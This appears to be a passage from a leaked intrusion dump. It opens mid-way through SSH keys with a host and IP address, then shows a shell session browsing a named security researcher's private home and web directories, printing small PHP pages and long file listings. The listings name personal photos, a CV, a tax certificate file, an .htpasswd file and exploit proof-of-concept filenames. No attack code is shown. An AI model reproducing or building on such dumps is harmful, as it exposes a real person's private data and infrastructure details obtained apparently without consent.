58vtRwqWZ20u5d0qT8sZIdSq5sJTYKYTBJ++xOBLzu4lhDT9XsmgDP9oMbeDWaY8HICkHKlHBQt/l0v
w0I5CW2TfRpSHEHZKNwTKJbcMCPiSmPT1BfySzQmKjEWfqBqAXgc8zhYOT3PX3TY+8Sijbt+txbDOTs
SRWU8Sv4jiAagKQUJrJU4BA+jTDYEW1vqCoVne4lv4scWo5Ui78IsQ== julien@p-doncule
perso.iiens.net,193.54.225.86 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAuI6ewi4LU8cyV31PeY7yD5z/vaT/dpRk9T3RQCGWj1t56Ou8Lfd
pL57moU05TwI/D549Of1w/kdHGazcZVVD1TXECk/ZdpIXZNuGJoxr9Cbd1rgY6hRmxGu/jP8MNNmqjY
kumzsl/HIUJhCTcndFRPRSaWRObCfeUiEwRduQwYM=
titiweb@flint:$ ls -la cr0/
total 168
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 .
drwx------  8 titiweb titiweb 8192 2009-06-10 17:17 ..
-rwx------  1 titiweb titiweb 1101 2009-03-08 21:20 about.html
drwx------  2 titiweb titiweb 8192 2006-03-28 11:42 aslr26
drwx------ 10 titiweb titiweb 8192 2009-05-07 22:30 bordel
drwx------  2 titiweb titiweb 8192 2005-12-29 03:21 cr0-ca
-rwx------  1 titiweb titiweb 2524 2008-05-28 12:44 cr0.css
drwx------  2 titiweb titiweb 8192 2007-06-17 18:54 exploits
-rwx------  1 titiweb titiweb 7629 2009-04-18 01:44 index.html
-rwx------  1 titiweb titiweb 7629 2009-05-20 00:16 index.html.bak
-rwx------  1 titiweb titiweb 6638 2008-09-28 08:12 index.xhtml
drwx------  2 titiweb titiweb 8192 2009-02-14 15:27 ip
drwx------  2 titiweb titiweb 8192 2008-09-16 17:37 kexploits-pub
drwx------  2 titiweb titiweb 8192 2005-12-30 12:13 lobster
drwx------  2 titiweb titiweb 8192 2009-05-19 22:26 misc
drwx------  2 titiweb titiweb 8192 2009-04-23 00:17 paper
drwx------  6 titiweb titiweb 8192 2008-09-14 12:20 pax
drwx------  3 titiweb titiweb 8192 2005-01-21 13:04 pax-obscure
drwx------  7 titiweb titiweb 8192 2008-07-07 22:52 progs
drwx------  2 titiweb titiweb 8192 2005-01-21 14:18 security-ca
-rwx------  1 titiweb titiweb	 0 2003-08-03 02:51 style.css
-rwx------  1 titiweb titiweb 3962 2008-12-22 22:26 vulnerabilities.html
titiweb@flint:$ cd cr0/
titiweb@flint:/cr0$ ls -la exploits/
total 16
drwx------  2 titiweb titiweb 8192 2007-06-17 18:54 .
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 ..
titiweb@flint:/cr0$ echo :\(
:(
titiweb@flint:/cr0$ ls -la ip/
total 24
drwx------  2 titiweb titiweb 8192 2009-02-14 15:27 .
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb  413 2009-02-14 15:17 index.php
titiweb@flint:/cr0$ cat ip/index.php 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="us">
<head>
<title>
My IP address
</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
<p>
<?
$ip=getenv(REMOTE_ADDR);
echo htmlentities($ip) . " (" . htmlentities(gethostbyaddr($ip)) . ")";
?>
</p>
</body>
</html>

titiweb@flint:/cr0$ ls -la kexploits-pub/
total 24
drwx------  2 titiweb titiweb 8192 2008-09-16 17:37 .
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb	11 2007-10-06 13:45 index.html
titiweb@flint:/cr0$ cat kexploits-pub/index.html 
A faire ;)
titiweb@flint:/cr0$ ls -la lobster/
total 48
drwx------  2 titiweb titiweb 8192 2005-12-30 12:13 .
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb  717 2005-12-30 12:13 index.php
-rwx------  1 titiweb titiweb 1318 2005-12-30 12:11 lobstercert.crt
-rwx------  1 titiweb titiweb  189 2005-12-30 12:11 lobstercert.crt.asc
-rwx------  1 titiweb titiweb  907 2005-12-30 12:10 style.css
titiweb@flint:/cr0$ cat lobster/index.php 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
<head>
<title>
Lobster certificate
</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="cr0.org CA" />
<link rel="stylesheet" href="style.css" type="text/css"/>
</head>
<body>
<div class="corps">
<p class="titre">lobster certificate</p>
<p>This certificate is signed with my GPG key</p>
<p class="me"><cite>-- Julien TINNES, Fri Dec 30 13:11:12 CET 2005</cite></p>

<a href="lobstercert.crt">Lobster certificate</a>
<br/>
<a href="lobstercert.crt.asc">GPG signature</a>
<br/>
</div>
</body>
</html>
titiweb@flint:/cr0$ cat pax-obscure/index.php  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
<head>
<title>
PaX obscurity patch
</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="PaX ASLR obscurity patch" />
<link rel="stylesheet" href="style.css" type="text/css"/>
</head>
<body>
<div class="corps">
<p class="titre">Small PaX obscurity patch </p>
<p>This patch prevents information leaking through /proc/#/maps and
/proc/#/stat as well as a little local console trick.</p>
<p class="masta"><cite>-- Julien TINNES, sat aug 30 23:24:05 CEST
2003</cite></p>

<a
href="pax+obs-linux-2.4.22-200308302223.tar.gz">pax+obs-linux-2.4.22-2003083022
23.tar.gz</a>
<br/>
<a href="pax+obs-linux-2.4.22-200308302223.tar.gz.sig">signature</a>
<p class="readme">
<? 
$fp=fopen("README-PAX+obs","r");
$contents = fread ($fp, filesize("README-PAX+obs"));
fclose($fp);
echo nl2br($contents);
?>
</p>
</div>
</body>
</html>
titiweb@flint:/cr0$ cat security-ca/index.php 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
<head>
<title>
Security CA GPG key
</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="Security CA" />
<link rel="stylesheet" href="style.css" type="text/css"/>
</head>
<body>
<div class="corps">
<p class="titre">CA for maintenance and installation of GNU/Linux </p>
<p>Security CA is a GPG key signing public keys which are usefull/necessary
when installing a GNU/Linux
System</p>
<p class="masta"><cite>-- Julien TINNES, Fri Jan 21 14:07:15 CET
2005</cite></p>

<a href="security-ca.asc">Security CA public key</a>
<br/>
<a href="security-ca-keyring.asc">Public keys signed by Security CA</a>
<br/>
<a href="README-security-CA.asc">Signed README</a>
<p class="readme">
<? 
$fp=fopen("README-security-CA","r");
$contents = fread ($fp, filesize("README-security-CA"));
fclose($fp);
echo nl2br($contents);
?>
</p>
</div>
</body>
</html>
titiweb@flint:/cr0$ cd ..
titiweb@flint:$ ls -la www/
total 784
drwx------ 2 titiweb titiweb   8192 2009-06-10 17:06 .
drwx------ 8 titiweb titiweb   8192 2009-06-10 17:17 ..
-rwx------ 1 titiweb titiweb	 11 2003-08-02 15:26 index.html
-rwx------ 1 titiweb titiweb 758661 2007-08-18 20:58 londre1.jpg
-rwx------ 1 titiweb titiweb	451 2006-01-02 12:51 rss.gif
-rwx------ 1 titiweb titiweb	 42 2005-11-20 00:09 update
titiweb@flint:/cr0$ ls -laR
.:
total 168
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 .
drwx------  8 titiweb titiweb 8192 2009-06-10 17:17 ..
-rwx------  1 titiweb titiweb 1101 2009-03-08 21:20 about.html
drwx------  2 titiweb titiweb 8192 2006-03-28 11:42 aslr26
drwx------ 10 titiweb titiweb 8192 2009-05-07 22:30 bordel
drwx------  2 titiweb titiweb 8192 2005-12-29 03:21 cr0-ca
-rwx------  1 titiweb titiweb 2524 2008-05-28 12:44 cr0.css
drwx------  2 titiweb titiweb 8192 2007-06-17 18:54 exploits
-rwx------  1 titiweb titiweb 7629 2009-04-18 01:44 index.html
-rwx------  1 titiweb titiweb 7629 2009-05-20 00:16 index.html.bak
-rwx------  1 titiweb titiweb 6638 2008-09-28 08:12 index.xhtml
drwx------  2 titiweb titiweb 8192 2009-02-14 15:27 ip
drwx------  2 titiweb titiweb 8192 2008-09-16 17:37 kexploits-pub
drwx------  2 titiweb titiweb 8192 2005-12-30 12:13 lobster
drwx------  2 titiweb titiweb 8192 2009-05-19 22:26 misc
drwx------  2 titiweb titiweb 8192 2009-04-23 00:17 paper
drwx------  6 titiweb titiweb 8192 2008-09-14 12:20 pax
drwx------  3 titiweb titiweb 8192 2005-01-21 13:04 pax-obscure
drwx------  7 titiweb titiweb 8192 2008-07-07 22:52 progs
drwx------  2 titiweb titiweb 8192 2005-01-21 14:18 security-ca
-rwx------  1 titiweb titiweb	 0 2003-08-03 02:51 style.css
-rwx------  1 titiweb titiweb 3962 2008-12-22 22:26 vulnerabilities.html

./aslr26:
total 88
drwx------  2 titiweb titiweb  8192 2006-03-28 11:42 .
drwx------ 15 titiweb titiweb  8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb 14191 2003-10-23 08:06
aslr26-linux-2.6.0-test8-200310230859.patch
-rwx------  1 titiweb titiweb	 64 2003-10-23 08:06
aslr26-linux-2.6.0-test8-200310230859.patch.sig
-rwx------  1 titiweb titiweb 14191 2003-10-27 22:15
aslr26-linux-2.6.0-test9-200310272244.patch
-rwx------  1 titiweb titiweb	 65 2003-10-27 22:15
aslr26-linux-2.6.0-test9-200310272244.patch.sig
-rwx------  1 titiweb titiweb  1018 2003-10-27 22:16 index.php
-rwx------  1 titiweb titiweb	268 2003-10-23 08:11 README-ASLR26
-rwx------  1 titiweb titiweb	910 2003-10-23 07:15 style.css

./bordel:
total 84264
drwx------ 10 titiweb titiweb	  8192 2009-05-07 22:30 .
drwx------ 15 titiweb titiweb	  8192 2009-05-20 00:17 ..
drwx------  4 titiweb titiweb	  8192 2007-09-10 22:29 15_aout
-rwx------  1 titiweb titiweb  6751875 2004-11-09 19:23 1758.zip
drwx------  2 titiweb titiweb	  8192 2008-02-10 15:14 annivs
drwx------  3 titiweb titiweb	  8192 2009-03-08 01:12 Appart-mtv
-rwx------  1 titiweb titiweb	  2643 2004-11-12 11:02
binfmt_elf_partial_read_pax.patch
-rwx------  1 titiweb titiweb  9698361 2008-06-10 13:29
c3550-ipservicesk9-mz.122-44.SE.bin
drwx------  2 titiweb titiweb	  8192 2006-07-09 23:02 caves
-rwx------  1 titiweb titiweb	683160 2008-08-25 21:35 cuisine1.jpg
-rwx------  1 titiweb titiweb	636068 2008-08-25 21:32 cuisine2.jpg
-rwx------  1 titiweb titiweb	 59227 2005-01-22 15:08 cv.julien.tinnes.pdf
-rwx------  1 titiweb titiweb	889319 2005-11-01 01:18 doc.sof.tgz
-rwx------  1 titiweb titiweb	889558 2005-11-01 01:19 doc.sof.zip
-rwx------  1 titiweb titiweb	189930 2008-03-30 19:22 dollar.lol.jpg
-rwx------  1 titiweb titiweb	  1025 2004-08-20 23:27 endofmd5.pl
-rwx------  1 titiweb titiweb	   532 2008-01-26 12:29 etats.hds
-rwx------  1 titiweb titiweb	210931 2006-11-06 22:13 grosse-bete.jpg
-rwx------  1 titiweb titiweb	537644 2007-09-19 10:43 img_0306.jpg
-rwx------  1 titiweb titiweb  1101200 2007-11-27 21:15 img_4353.jpg
-rwx------  1 titiweb titiweb  1184202 2007-11-27 21:16 img_4355.jpg
-rwx------  1 titiweb titiweb	  2791 2009-05-07 00:06 impotscertif1.p12
-rwx------  1 titiweb titiweb	 71680 2008-06-10 14:34 jt-openssl2008.doc
-rwx------  1 titiweb titiweb	 99220 2006-05-19 16:31 jt-securitech-06-11.pdf
drwx------  2 titiweb titiweb	  8192 2006-06-24 20:30 juan
-rwx------  1 titiweb titiweb	  1043 2005-01-13 06:19
linux-2.4.28-CAN-2005-0001-grsec.patch
-rwx------  1 titiweb titiweb	    65 2005-01-16 12:51
linux-2.4.28-CAN-2005-0001-grsec.patch.sig
-rwx------  1 titiweb titiweb 26818560 2009-05-07 22:33 meder_filipe.tar
-rwx------  1 titiweb titiweb	   759 2004-01-07 00:11 mremap.2.4.22.patch
-rwx------  1 titiweb titiweb	   832 2004-02-18 13:50 mremap_newvuln.patch
-rwx------  1 titiweb titiweb	287867 2006-11-17 22:32 nuclear_polkka.swf
-rwx------  1 titiweb titiweb	 10864 2005-11-26 21:42 obsddtd.c
-rwx------  1 titiweb titiweb	 86354 2006-11-13 08:51 peur_dans_bouche_2.png
-rwx------  1 titiweb titiweb	 96211 2006-11-07 15:47 peur.dans.la.bouche.png
drwx------  2 titiweb titiweb	  8192 2006-05-27 11:47 ph
-rwx------  1 titiweb titiweb	244239 2006-05-27 11:55 ph-1.jpg
-rwx------  1 titiweb titiweb	116361 2005-11-26 23:39 plop.tgz
-rwx------  1 titiweb titiweb	  2800 2006-07-12 23:01 prctlpute.c
-rwx------  1 titiweb titiweb	 13315 2005-01-07 15:16 pwned.c
-rwx------  1 titiweb titiweb	 77412 2006-06-22 10:22 rc
-rwx------  1 titiweb titiweb	   165 2007-08-04 02:27 rideaux
-rwx------  1 titiweb titiweb	 77460 2006-06-22 10:20 rp
-rwx------  1 titiweb titiweb  6210655 2008-02-23 19:48 sarkozy.parisien.flv
-rwx------  1 titiweb titiweb  9772994 2004-09-12 20:01 Saumon1.avi
-rwx------  1 titiweb titiweb  7688524 2004-09-12 19:56 Saumon2.avi
-rwx------  1 titiweb titiweb	  1836 2004-04-21 18:46 setsockopt_detect.c
-rwx------  1 titiweb titiweb	  1969 2004-04-21 01:09 setsockopt_poc.c
-rwx------  1 titiweb titiweb	592771 2005-10-22 22:02 shot00001.png
-rwx------  1 titiweb titiweb  1440018 2005-10-22 21:58 shot00001.tga
-rwx------  1 titiweb titiweb	474215 2005-10-22 22:02 shot00002.png
-rwx------  1 titiweb titiweb  1440018 2005-10-22 21:59 shot00002.tga
drwx------  2 titiweb titiweb	  8192 2007-08-06 16:58 suicide
-rwx------  1 titiweb titiweb	  1424 2005-12-14 00:45 tcexevppoc.c
-rwx------  1 titiweb titiweb  5295334 2007-05-27 11:32
The.Pragmatic.Programmers.Programming.Ruby.2nd.pdf
-rwx------  1 titiweb titiweb	  8192 2005-01-08 00:26 TTsharefile
-rwx------  1 titiweb titiweb	 11580 2006-05-18 16:04 tweakcrc
drwx------  2 titiweb titiweb	  8192 2008-05-21 21:55 usa
-rwx------  1 titiweb titiweb	295606 2007-04-30 10:33 wii.hack.jpg
-rwx------  1 titiweb titiweb  1893567 2004-06-18 10:55 WinSSL_Wrap_v1_17.zip

./bordel/15_aout:
total 33952
drwx------  4 titiweb titiweb	 8192 2007-09-10 22:29 .
drwx------ 10 titiweb titiweb	 8192 2009-05-07 22:30 ..
-rwx------  1 titiweb titiweb  140869 2007-08-16 22:25 danger.png
-rwx------  1 titiweb titiweb	  148 2007-08-16 21:07 .htaccess
-rwx------  1 titiweb titiweb	   44 2007-08-16 22:35 .htpasswd
-rwx------  1 titiweb titiweb  360715 2007-08-16 21:12 i_know_kung_fu2.jpg
-rwx------  1 titiweb titiweb  112046 2007-08-16 21:05 kungfu_actionseries.jpg
-rwx------  1 titiweb titiweb 1302259 2007-08-16 21:21 kung_fu_pouik2.jpg
-rwx------  1 titiweb titiweb 7655184 2007-08-16 14:21 mvi_0132.avi
-rwx------  1 titiweb titiweb 5696446 2007-08-16 14:22 mvi_0138.avi
-rwx------  1 titiweb titiweb 3944762 2007-08-16 14:22 mvi_0139.avi
-rwx------  1 titiweb titiweb 1282360 2007-08-16 18:21 ou.est.internet.jpg
-rwx------  1 titiweb titiweb	32644 2007-08-16 22:31 path_of_pouik.jpg
-rwx------  1 titiweb titiweb  354335 2007-08-16 21:12 pinces.a.linge.jpg
-rwx------  1 titiweb titiweb  181903 2007-08-16 20:25 pouik.is.gay.jpg
-rwx------  1 titiweb titiweb	28503 2007-08-16 21:05 Pouik_Pwnt.jpg
drwx------  3 titiweb titiweb	 8192 2007-08-23 19:06 pouik_star
-rwx------  1 titiweb titiweb 1565479 2007-08-16 18:13 pouik_volant_is_back.jpg
-rwx------  1 titiweb titiweb 1586115 2007-08-16 14:30 pouik_volant.jpg
drwx------  2 titiweb titiweb	 8192 2007-09-10 22:36 rabijacob
-rwx------  1 titiweb titiweb	  120 2007-08-16 14:23 rabi.jacob.html
-rwx------  1 titiweb titiweb 3064398 2007-08-16 22:00 roulade.avi
-rwx------  1 titiweb titiweb	30720 2004-11-07 18:20 trouver.jere.jpg
-rwx------  1 titiweb titiweb 1548958 2007-08-16 22:15 wtf2.jpg
-rwx------  1 titiweb titiweb 1544689 2007-08-16 22:13 wtf.jpg
-rwx------  1 titiweb titiweb  966254 2007-08-16 18:31 yaya.slave.jpg
-rwx------  1 titiweb titiweb 1493886 2007-08-16 18:15 yaya_und_jere.jpg
-rwx------  1 titiweb titiweb 1726096 2007-08-16 21:05 ZvsP.gif

./bordel/15_aout/pouik_star:
total 1120
drwx------ 3 titiweb titiweb   8192 2007-08-23 19:06 .
drwx------ 4 titiweb titiweb   8192 2007-09-10 22:29 ..
drwx------ 3 titiweb titiweb   8192 2007-08-23 19:06 4chan.poiaze.com
-rwx------ 1 titiweb titiweb 345998 2007-08-23 18:20 fatfighterep8.jpg
-rwx------ 1 titiweb titiweb 766224 2007-08-23 18:23 ninja001.jpg

./bordel/15_aout/pouik_star/4chan.poiaze.com:
total 32
drwx------ 3 titiweb titiweb 8192 2007-08-23 19:06 .
drwx------ 3 titiweb titiweb 8192 2007-08-23 19:06 ..
-rwx------ 1 titiweb titiweb   34 2007-05-07 22:50 robots.txt
drwx------ 3 titiweb titiweb 8192 2007-08-23 19:06 thread

./bordel/15_aout/pouik_star/4chan.poiaze.com/thread:
total 40
drwx------ 3 titiweb titiweb 8192 2007-08-23 19:06 .
drwx------ 3 titiweb titiweb 8192 2007-08-23 19:06 ..
drwx------ 4 titiweb titiweb 8192 2007-08-23 19:06 36396541.html
-rwx------ 1 titiweb titiweb 3807 2007-01-19 18:11 burichan.css
-rwx------ 1 titiweb titiweb 3386 2006-07-10 22:29 script.js

./bordel/15_aout/pouik_star/4chan.poiaze.com/thread/36396541.html:
total 232
drwx------ 4 titiweb titiweb   8192 2007-08-23 19:06 .
drwx------ 3 titiweb titiweb   8192 2007-08-23 19:06 ..
drwx------ 2 titiweb titiweb  16384 2007-08-23 19:06 img
-rwx------ 1 titiweb titiweb 184577 2007-08-17 03:18 index.html
drwx------ 2 titiweb titiweb  16384 2007-08-23 19:06 thumb

./bordel/15_aout/pouik_star/4chan.poiaze.com/thread/36396541.html/img:
total 20104
drwx------ 2 titiweb titiweb   16384 2007-08-23 19:06 .
drwx------ 4 titiweb titiweb	8192 2007-08-23 19:06 ..
-rwx------ 1 titiweb titiweb  360715 2007-08-16 22:45 1187300543713.jpg
-rwx------ 1 titiweb titiweb   70784 2007-08-16 22:48 1187300740418.jpg
-rwx------ 1 titiweb titiweb  112046 2007-08-16 22:48 1187300864541.jpg
-rwx------ 1 titiweb titiweb   79271 2007-08-16 22:52 1187300971099.jpg
-rwx------ 1 titiweb titiweb   28623 2007-08-16 22:52 1187301030417.jpg
-rwx------ 1 titiweb titiweb   32644 2007-08-16 22:55 1187301127893.jpg
-rwx------ 1 titiweb titiweb  999999 2007-08-16 22:58 1187301433709.png
-rwx------ 1 titiweb titiweb   80254 2007-08-16 23:01 1187301528140.jpg
-rwx------ 1 titiweb titiweb  217839 2007-08-16 23:02 1187301673783.jpg
-rwx------ 1 titiweb titiweb  140869 2007-08-16 23:05 1187301736711.png
-rwx------ 1 titiweb titiweb   17384 2007-08-16 23:05 1187301797837.png
-rwx------ 1 titiweb titiweb	   0 2007-08-16 23:05 1187301804968.jpg
-rwx------ 1 titiweb titiweb   28503 2007-08-16 23:15 1187302285666.jpg
-rwx------ 1 titiweb titiweb  132697 2007-08-16 23:18 1187302482873.jpg
-rwx------ 1 titiweb titiweb  201479 2007-08-16 23:18 1187302486640.jpg
-rwx------ 1 titiweb titiweb  116510 2007-08-16 23:18 1187302560579.jpg
-rwx------ 1 titiweb titiweb   48955 2007-08-16 23:18 1187302571381.jpg
-rwx------ 1 titiweb titiweb  179599 2007-08-16 23:21 1187302765459.jpg
-rwx------ 1 titiweb titiweb  288887 2007-08-16 23:25 1187302913932.png
-rwx------ 1 titiweb titiweb  115999 2007-08-16 23:25 1187302989946.jpg
-rwx------ 1 titiweb titiweb   53276 2007-08-16 23:25 1187303011971.png
-rwx------ 1 titiweb titiweb 1061007 2007-08-16 23:28 1187303071212.jpg
-rwx------ 1 titiweb titiweb  127903 2007-08-16 23:31 1187303462307.jpg
-rwx------ 1 titiweb titiweb  125220 2007-08-16 23:34 1187303527920.jpg
-rwx------ 1 titiweb titiweb  148156 2007-08-16 23:35 1187303540801.jpg
-rwx------ 1 titiweb titiweb  531381 2007-08-16 23:38 1187303764731.jpg
-rwx------ 1 titiweb titiweb 1018317 2007-08-16 23:38 1187303782359.png
-rwx------ 1 titiweb titiweb   90456 2007-08-16 23:38 1187303803798.png
-rwx------ 1 titiweb titiweb  137335 2007-08-16 23:41 1187303990254.png
-rwx------ 1 titiweb titiweb 1726096 2007-08-16 23:44 1187304145249.gif
-rwx------ 1 titiweb titiweb   46933 2007-08-16 23:51 1187304501360.gif
-rwx------ 1 titiweb titiweb 1283663 2007-08-16 23:54 1187304696964.jpg
-rwx------ 1 titiweb titiweb   78802 2007-08-16 23:54 1187304720575.jpg
-rwx------ 1 titiweb titiweb   41591 2007-08-16 23:54 1187304772063.jpg
-rwx------ 1 titiweb titiweb  219894 2007-08-17 00:00 1187305061290.png
-rwx------ 1 titiweb titiweb  122365 2007-08-17 00:07 1187305489403.jpg
-rwx------ 1 titiweb titiweb   17704 2007-08-17 00:07 1187305548366.jpg
-rwx------ 1 titiweb titiweb  167493 2007-08-17 00:07 1187305572213.png
-rwx------ 1 titiweb titiweb   43425 2007-08-17 00:10 1187305731950.jpg
-rwx------ 1 titiweb titiweb  368269 2007-08-17 00:13 1187305874642.jpg
-rwx------ 1 titiweb titiweb   94540 2007-08-17 00:13 1187305922107.png
-rwx------ 1 titiweb titiweb  206682 2007-08-17 00:16 1187306028645.jpg
-rwx------ 1 titiweb titiweb  337291 2007-08-17 00:16 1187306120044.jpg
-rwx------ 1 titiweb titiweb  419453 2007-08-17 00:23 1187306453748.jpg
-rwx------ 1 titiweb titiweb  418298 2007-08-17 00:23 1187306474631.jpg
-rwx------ 1 titiweb titiweb  420163 2007-08-17 00:23 1187306484013.jpg
-rwx------ 1 titiweb titiweb  418690 2007-08-17 00:23 1187306495820.jpg
-rwx------ 1 titiweb titiweb   67626 2007-08-17 00:30 1187306813186.jpg
-rwx------ 1 titiweb titiweb   10937 2007-08-17 00:30 1187306847145.jpg
-rwx------ 1 titiweb titiweb   27880 2007-08-17 00:33 1187307069073.jpg
-rwx------ 1 titiweb titiweb   90105 2007-08-17 00:36 1187307229926.jpg
-rwx------ 1 titiweb titiweb   74349 2007-08-17 00:36 1187307265581.jpg
-rwx------ 1 titiweb titiweb   47741 2007-08-17 00:36 1187307279236.jpg
-rwx------ 1 titiweb titiweb   26379 2007-08-17 00:36 1187307289499.jpg
-rwx------ 1 titiweb titiweb  727123 2007-08-17 00:37 1187307300191.jpg
-rwx------ 1 titiweb titiweb  349015 2007-08-17 00:40 1187307425299.png
-rwx------ 1 titiweb titiweb  207129 2007-08-17 00:46 1187307842658.jpg
-rwx------ 1 titiweb titiweb  372071 2007-08-17 00:50 1187308126848.jpg
-rwx------ 1 titiweb titiweb   20063 2007-08-17 00:50 1187308138121.jpg
-rwx------ 1 titiweb titiweb  132640 2007-08-17 00:50 1187308139077.jpg
-rwx------ 1 titiweb titiweb  274532 2007-08-17 00:50 1187308152854.jpg
-rwx------ 1 titiweb titiweb  179068 2007-08-17 00:53 1187308165364.jpg
-rwx------ 1 titiweb titiweb   90640 2007-08-17 00:53 1187308176276.jpg
-rwx------ 1 titiweb titiweb   82600 2007-08-17 00:53 1187308188630.jpg
-rwx------ 1 titiweb titiweb   50124 2007-08-17 00:53 1187308201458.jpg
-rwx------ 1 titiweb titiweb  339107 2007-08-17 00:53 1187308212815.png
-rwx------ 1 titiweb titiweb   59453 2007-08-17 00:53 1187308215293.jpg
-rwx------ 1 titiweb titiweb   82459 2007-08-17 00:53 1187308226796.jpg
-rwx------ 1 titiweb titiweb	8380 2007-08-17 00:53 1187308239298.jpg
-rwx------ 1 titiweb titiweb   29037 2007-08-17 00:53 1187308243568.jpg
-rwx------ 1 titiweb titiweb   29039 2007-08-17 00:53 1187308275904.jpg
-rwx------ 1 titiweb titiweb	2695 2007-08-17 01:00 1187308601651.png
-rwx------ 1 titiweb titiweb   58909 2007-08-17 01:00 1187308740297.jpg
-rwx------ 1 titiweb titiweb   54987 2007-08-17 01:03 1187308848421.jpg
-rwx------ 1 titiweb titiweb 1039839 2007-08-17 01:16 1187309608848.png
-rwx------ 1 titiweb titiweb   32994 2007-08-17 01:20 1187309830798.jpg
-rwx------ 1 titiweb titiweb   31003 2007-08-17 01:20 1187309896440.jpg
-rwx------ 1 titiweb titiweb  166256 2007-08-17 01:26 1187310156258.jpg
-rwx------ 1 titiweb titiweb   62771 2007-08-17 01:26 1187310281787.jpg
-rwx------ 1 titiweb titiweb   19632 2007-08-17 01:26 1187310334487.jpg
-rwx------ 1 titiweb titiweb   56584 2007-08-17 01:30 1187310509830.jpg
-rwx------ 1 titiweb titiweb   20517 2007-08-17 01:36 1187310925481.jpg
-rwx------ 1 titiweb titiweb  106665 2007-08-17 01:43 1187311290186.png
-rwx------ 1 titiweb titiweb   20170 2007-08-17 01:46 1187311444508.gif
-rwx------ 1 titiweb titiweb   99246 2007-08-17 01:46 1187311501200.jpg
-rwx------ 1 titiweb titiweb   17734 2007-08-17 01:53 1187311782043.jpg
-rwx------ 1 titiweb titiweb  116347 2007-08-17 01:53 1187311898918.png
-rwx------ 1 titiweb titiweb  184724 2007-08-17 01:57 1187312121347.gif
-rwx------ 1 titiweb titiweb   52667 2007-08-17 02:00 1187312179145.jpg
-rwx------ 1 titiweb titiweb   47574 2007-08-17 02:00 1187312342732.jpg
-rwx------ 1 titiweb titiweb   22970 2007-08-17 02:11 1187312893008.jpg
-rwx------ 1 titiweb titiweb  187531 2007-08-17 02:14 1187313027904.png
-rwx------ 1 titiweb titiweb   10873 2007-08-17 02:17 1187313329290.jpg
-rwx------ 1 titiweb titiweb   40034 2007-08-17 02:21 1187313417484.jpg
-rwx------ 1 titiweb titiweb  148576 2007-08-17 02:21 1187313426706.png
-rwx------ 1 titiweb titiweb  189723 2007-08-17 02:24 1187313802631.png
-rwx------ 1 titiweb titiweb   34018 2007-08-17 02:28 1187314062980.jpg
-rwx------ 1 titiweb titiweb   49441 2007-08-17 02:45 1187314892419.jpg
-rwx------ 1 titiweb titiweb   40458 2007-08-17 02:45 1187315032890.jpg
-rwx------ 1 titiweb titiweb   68633 2007-08-17 02:49 1187315112574.jpg
-rwx------ 1 titiweb titiweb  357152 2007-08-17 02:56 1187315630830.png
-rwx------ 1 titiweb titiweb  404329 2007-08-17 02:59 1187315803673.jpg

./bordel/15_aout/pouik_star/4chan.poiaze.com/thread/36396541.html/thumb:
total 832
drwx------ 2 titiweb titiweb 16384 2007-08-23 19:06 .
drwx------ 4 titiweb titiweb  8192 2007-08-23 19:06 ..
-rwx------ 1 titiweb titiweb  7856 2007-08-16 22:45 1187300543713s.jpg
-rwx------ 1 titiweb titiweb  3171 2007-08-16 22:48 1187300740418s.jpg
-rwx------ 1 titiweb titiweb  3411 2007-08-16 22:48 1187300864541s.jpg
-rwx------ 1 titiweb titiweb  4036 2007-08-16 22:52 1187300971099s.jpg
-rwx------ 1 titiweb titiweb  3546 2007-08-16 22:52 1187301030417s.jpg
-rwx------ 1 titiweb titiweb  3379 2007-08-16 22:55 1187301127893s.jpg
-rwx------ 1 titiweb titiweb  2808 2007-08-16 22:58 1187301433709s.jpg
-rwx------ 1 titiweb titiweb  3356 2007-08-16 23:01 1187301528140s.jpg
-rwx------ 1 titiweb titiweb  3589 2007-08-16 23:02 1187301673783s.jpg
-rwx------ 1 titiweb titiweb  2730 2007-08-16 23:05 1187301736711s.jpg
-rwx------ 1 titiweb titiweb  4605 2007-08-16 23:05 1187301797837s.jpg
-rwx------ 1 titiweb titiweb  3252 2007-08-16 23:08 1187301804968s.jpg
-rwx------ 1 titiweb titiweb  3107 2007-08-16 23:15 1187302285666s.jpg
-rwx------ 1 titiweb titiweb  2988 2007-08-16 23:18 1187302482873s.jpg
-rwx------ 1 titiweb titiweb  2270 2007-08-16 23:18 1187302486640s.jpg
-rwx------ 1 titiweb titiweb  3192 2007-08-16 23:18 1187302560579s.jpg
-rwx------ 1 titiweb titiweb  2578 2007-08-16 23:18 1187302571381s.jpg
-rwx------ 1 titiweb titiweb  2897 2007-08-16 23:21 1187302765459s.jpg
-rwx------ 1 titiweb titiweb  3343 2007-08-16 23:25 1187302913932s.jpg
-rwx------ 1 titiweb titiweb  3102 2007-08-16 23:25 1187302989946s.jpg
-rwx------ 1 titiweb titiweb  2435 2007-08-16 23:25 1187303011971s.jpg
